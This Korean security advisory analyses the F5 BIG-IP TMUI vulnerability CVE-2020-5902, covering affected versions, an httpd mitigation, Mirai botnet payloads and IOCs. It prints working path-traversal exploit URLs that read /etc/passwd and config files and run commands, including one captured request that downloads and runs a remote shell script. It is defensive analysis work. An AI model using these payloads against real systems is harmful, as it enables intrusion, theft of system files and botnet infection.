F5 BIG-IP TMUI RCE 취약점 (CVE-2020-5902) 분석 자료

BIG-IP 원격 코드 실행(RCE) 취약점(CVE-2020-5902)

이 취약점은 2020년 7월에 발견되었고, 발견 당시 해당 취약점을 이용한 많은 공격이 이루어졌음

그리고 취약점 Risk 점수가 10점으로 영향도가 많이 높음

설명

TMUI(Traffic Management User Interface) 취약점을 악용해 인증없이 원격에서 코드를 실행하여 파일 생성/삭제, 서비스 제어, 정보 탈취 등 여러 악성행위를 할 수 있으며, 추가 악성 행위로 내부 네트워크에 악성행위를 확장할 수 있음

F5 BIG-IP 제품은 전세계적으로 많이 사용하는 제품이라 각별한 주의가 필요함

 

 

 

취약점 트래픽

• 탐지 트래픽

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http%3A%2F%2F23.224.121[.]247%2Fohshit.sh+%3B+chmod+777+ohshit.sh+%[3B+sh+ohshit.sh](<http://3b+sh+ohshit.sh/>)

• 알려진 트래픽

https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

취약 버전 및 패치 버전

제품	취약 버전	패치 버전
BIG-IP	15.0.0-15.1.0 14.1.0-14.1.2 13.1.0-13.1.3 12.1.0-12.1.5 11.6.1-11.6.5	15.0.1.4, 15.1.0.4 14.1.2.6 13.1.3.4 12.1.5.2 11.6.5.2

임시 조치

LocationMatch 설정을 통해 URL에 ; 또는 hsqldb 문자열이 탐지되는 경우 404 에러페이지로 리다이렉션

# TMOS Shell 
> tmsh

# 설정 들어가기
> edit /sys httpd all-properties

# httpd 설정
# include none 부분에 작성
include '
<LocationMatch ";">
Redirect 404 /
</LocationMatch>
<LocationMatch "hsqldb">
Redirect 404 /
</LocationMatch>
'

# 설정 종료
ESC 키
: wq!

# 설정 저장
save /sys config

# 서비스 재시작
restart sys service httpd

 

 

 

탐지 트래픽 분석 내용

트래픽

• /tmui/login.jsp/..; : 취약점을 이용하는 Request
• wget+http%3A%2F%2F23.224.121[.]247%2Fohshit.sh+%3B+chmod+777+ohshit.sh+%[3B+sh+ohshit.s](<http://3b+sh+ohshit.sh/>)
• 23.224.121[.]247에서 ohshit[.]sh 파일 다운로드, 권한 변경 및 실행

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http%3A%2F%2F23.224.121[.]247%2Fohshit.sh+%3B+chmod+777+ohshit.sh+%[3B+sh+ohshit.sh](<http://3b+sh+ohshit.sh/>)

23.224.121[.]247

• 악성 평판

• 관련 파일

ohshit[.]sh

• wget, curl을 통해 boatnet.* 다수의 악성 파일들 다운로드

boatnet*. 파일

ohshit[.]sh 파일에서 받아지는 모든 파일은 elf(리눅스 실행 파일) 파일임

몇몇 파일은 UPX 패킹되어 있음

• elf

• UPX 패킹

• 언패킹 후 파일 분석
  
  • Botnet String으로 알려진 Self…Fucking…Big 문자열 확인 (Mirai or yakuza Botnet)
  • 내부 네트워크 정보 수집을 위해 SSDP(Simple Service Discovery Protocol) 설정 관련 문자열이 확인되고, 정상적인 자산처럼 보이기위해 ST(URN)와 USER-AGENT로 위장 설정으로 추정
  • M-SEARCH : Multicast
  • HOST : Broadcast / 1900 포트
  • MX : 응답시간 1초
  • ST : 응답 URN
  • USER-AGENT : Google Chrome

• 평판 조회

모든 boatnet.* 파일들은 Mirai Botnet 관련 악성 파일로 분류됨

 

 

 

IOC 정보

구분	내용
IP	23.224.121[.]248
HASH (SHA256)	ddff877311bf4df026f09ad05a507425d8bcc81c5132b021b10f989c74a60686
	99cf123963ad52711cfa3aafd243f34e5f031ca31b0e557a150b0511d4e43822
	038f396afa2a69cc06ada36133eae7a43d4b277019e88dbc9e9b0b1a757efea3
	01932ed966bcb5611ddfdd54cff2250b3c16a8006340d72e847370b99e49ec99
	35cafd4e4d4291c26c1821b096fad53cf43e043f91f76cf8dd23833900721065
	26d94936c6f35c98aa1c8621dfa8818d54fc5b0b1a897ecc7946c402e7ca3e7d
	f3773094faecc5462183457078e416c4e7ac51349eb25bfb6de32a75bfdbf026
URL 패턴	/tmui/login.jsp/..;

 

 

결론

2020년도에 발견된 취약점이고 시간이 많이 지난 상태이지만 현재까지도 해당 취약점을 이용한 공격이 많이 됨

대부분의 파일들이 Anti-Virus, EPP등 보안 솔루션에서 탐지/차단이 되지만, Linux 서버에 보안 솔루션이 설치되어 있지 않다면 상당히 위험함

운영중인 제품의 버전이 낮아서 해당 취약점을 가지고 있는 상태라면

IOC를 통한 사전 차단과 취약점 패치 등 조치를 취해야 함

• 취약점 버전 패치
• IP, URL, HASH 차단 설정
• TMUI httpd 설정 (임시 조치)
• 운영 시스템의 취약점 뉴스, 버전 상태 등 주기적 확인과 보안 패치 운영